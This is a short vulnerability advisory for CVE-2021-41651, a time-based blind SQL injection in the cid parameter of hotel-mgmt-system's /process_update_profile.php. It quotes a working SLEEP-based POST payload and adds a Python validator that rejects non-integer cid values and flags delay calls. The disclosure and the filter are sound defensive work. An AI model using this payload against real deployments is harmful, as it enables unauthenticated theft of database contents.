MobiusBinary/CVE-2021-41651

CVE-2021-41651

CVE-2021-41651 SQL Injection in hotel-mgmt-system

The hotel-mgmt-system is vulnerable to an unauthenticated, time-based blind SQL injection attack.

The cid parameter on the /process_update_profile.php page does not sanitize user input, so an attacker can extract sensitive data from the underlying MySQL database.

Link To Application

hotel-mgmt-system

Affected Components & Parameter

URL: /process_update_profile.php
PARAMETER: cid

PoCs

SQLMAP PAYLOADS

cid parameter on the /process_update_profile.php page

Parameter: cid ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&email=me@you.com&newPassword=fasdfasdfasdfasdfasdf-

[Figure: POC - CID (animated GIF of the proof of concept)]
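As an added example (not part of the original repository), the check below shows how a defender could triage or pre-filter form-encoded bodies sent to /process_update_profile.php by requiring cid to be a single plain integer. The function names, the 10-digit limit and every sample body except the reported payload are assumptions; the fix in the application itself remains binding cid as a typed parameter in the SQL query.

```python
import re
from typing import NamedTuple
from urllib.parse import parse_qs

CID_RE = re.compile(r"[0-9]{1,10}")  # assumption: cid is a small positive integer
DELAY_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)


class Verdict(NamedTuple):
    allowed: bool
    reason: str


def check_body(body: str) -> Verdict:
    """Validate cid in a form-encoded body sent to /process_update_profile.php."""
    # parse_qs percent-decodes values, so encoded input is inspected in the clear.
    values = parse_qs(body, keep_blank_values=True).get("cid", [])
    if len(values) != 1:
        # A missing or repeated cid is rejected: parsers disagree on which copy wins.
        return Verdict(False, "cid missing or repeated")
    cid = values[0]
    if CID_RE.fullmatch(cid):
        return Verdict(True, "ok")
    if DELAY_RE.search(cid):
        return Verdict(False, "non-numeric cid with time-delay call")
    return Verdict(False, "non-numeric cid")


# Sample bodies: "reported" is the payload quoted on this page, the rest are constructed.
SAMPLES = {
    "benign": "phone=123456778&cid=14&submitBtn=Update&fullName=James&email=me%40you.com",
    "reported": "phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf"
                "&submitBtn=Update&fullName=James&email=me@you.com&newPassword=fasdfasdfasdfasdfasdf-",
    "repeated": "cid=14&cid=15&submitBtn=Update",
    "blank": "phone=123456778&cid=&submitBtn=Update",
}


def triage(samples: dict[str, str]) -> dict[str, Verdict]:
    """Run check_body over named request bodies and return one verdict per name."""
    return {name: check_body(body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name:9} allowed={verdict.allowed!s:5} {verdict.reason}")
```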

Discovered by

Jason Colyvas
MOBIUSBINARY
September 23rd, 2021
